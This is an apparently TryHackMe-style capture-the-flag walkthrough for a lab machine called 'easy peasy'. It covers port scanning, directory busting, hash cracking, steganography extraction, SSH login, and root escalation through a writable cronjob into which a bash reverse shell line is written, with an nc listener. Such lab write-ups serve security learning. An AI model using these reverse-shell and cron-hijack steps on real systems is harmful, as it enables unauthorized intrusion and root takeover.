easy peasy

Get the IP of the machine and Ping it ( to see if its live or not ) Scan all the open ports using Nmap, for this try the command below

nmap 10.10.219.249 -p- -T4

-p- is to scan all the port

-A is for aggressive scan

We got 3 open ports Right? 1st is 80, 2nd is 6498, 3rd is 65524.

Now we scan these open ports with Nmap to see the versions

nmap -sV 10.10.219.249 -p80,6498,65524

-sV It is used to find the version on open ports.

-p It is useful to scan the specified ports.

We got “Apache” and nigix version 1.16.1

Now we run Gobuster for directory busting using the following command along wordlist

gobuster dir -u 10.10.219.249 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster is used for directory busting.

dir Uses directory/file enumeration mode

-w Path to the wordlist. Set to - to use STDIN.

/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt specifies the path to a word lists (in this case, directory-list-2.3-medium.txt) to use for the dictionary busting.

We got “hidden” directory and robots.txt.

Now we have the hidden dir, so we can start our next buster from hidden dir, for this we just add the dir against the IP.

We got it! its named as “whatever”

Now, we’ll take a look at this, by putting this whole URL into the browser, like below

10.10.219.249/hidden/whatever/

We got a picture, Right click on the page, there’s a menu View Page Source nothing in it? No Its there.

It contain “==” so we know its a base64 Encode, We use base64 Decoder to see what it has!

We got our 1st Flag, Congratulations.

Now we use robots.txt, and add the open port as well, like below

10.10.219.249:65524/robots.txt

Woohoo! we got the hash key, now to identify the hash we use hash-identifier,

Now we know its “md5”, its time to crack the hash, using https://md5hashing.net/ Here’s our 2nd Flag,

Now, we’re in a hunt for 3rd flag and a hidden directory as well! Let’s keep hunting

We have the IP, and the open port which is 65524, Let’s try to find what it has for us,

We have Apache’s by Default page hosted here, Now guess what we do Yes, You got it, View Source Page.

This is what we find here, A base Encoding string: Now we have to find it which base this is? Here are a list of bases: Try one by one these Decoders.

Base16

Base32

Base36

Base58

Base62

Base64

Base64Url

Base85

Ascii85

Base91

Base92

This is base62, Yes we nailed it!

You Got Hidden dir.

Scroll down the same View source Page and we got our 3rd Flag

For the next task, we need to go to hidden path which we found earlier.

When we go to hidden path, we found another picture, which look’s mysterious, isn’t it?

Let check the view page source.

Look we found the some thing, let crack this hash.

To crack this, They gave us a Hint, let read the hint.

They told us in hint is that, use the john to crack this hash and use the specific wordlist which is provided.

Download the file and saved the hash into text file.

john --wordlist=easypeasy.txt --format=gost <filename.txt>

john John the Ripper (JTR) is a free, open-source software tool used by hackers, both ethical and otherwise, for password cracking. The software is typically used in a UNIV/Linux and Mac OS X environment where it can detect weak passwords.

By using this, we got the password.

And this is the answer of following task.

While we find the hash, this image name look’s suspicious.

Let extract this image, for extract this image, First we need to download this image.

After downloading extract it by using this command

steghide extract -sf <filename>

Steghide Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files.

extract This command is used to extract the data.

-sf Specify the stego file (the file that contains embedded data).

If you don’t have steghide, Then simply install it by using this command

sudo apt install steghide

While extracting the image, It ask us to enter the passphrase.

Which we already find by cracking the hash by using john hash cracking tool.

It extract the data and store in secrettext.txt file.

Let open the file and read the data.

It gave us username and password.

First convert this binary password into simple form.

To do this we used the CyberChef website.

Here we go, We get the password of login machine via SSH.

we have the user name and now we get a password, let try to sign in ssh port which is given.

User flag:

ssh boring@10.10.9.236 -p 6498

-p it represent the port on which ssh service is open.

In this case port 6498 is open.

Amazing! we make it.

Now we need to find the user flag or the next task.

We found the user flag by simply doing the ls command. But it also tell us that It seems like It is rotated.

Worry not, we use CyberChef again to solve this.

Here we go, we found the user flag.

Root flag:

For the root flag we need to have root privileges.

For root privileges, we look for cronjobs.

Which help us to get root access.

For to do this run the following command

cat /etc/crontab

By doing this we find the one cronjob which is actually a script.

Let find it and modify the script to get the root privileges.

Follow the path which is given.

When we go to the following path we got just a directory.

By doing ls -la, we got the cronjob.

Let modify it, By simply putting the following script.

bash -i >& /dev/tcp/10.10.219.249/<port> 0>&1

And save the file and give it executable permission.

Now listen the port

nc -lvnp <port>

We successfully get the root shell.

Now find the root flag

Like before by doing ls -la, we got the root flag.

Just cat the the .root.txt we get the root flag.

Congratulations!!! we complete the room.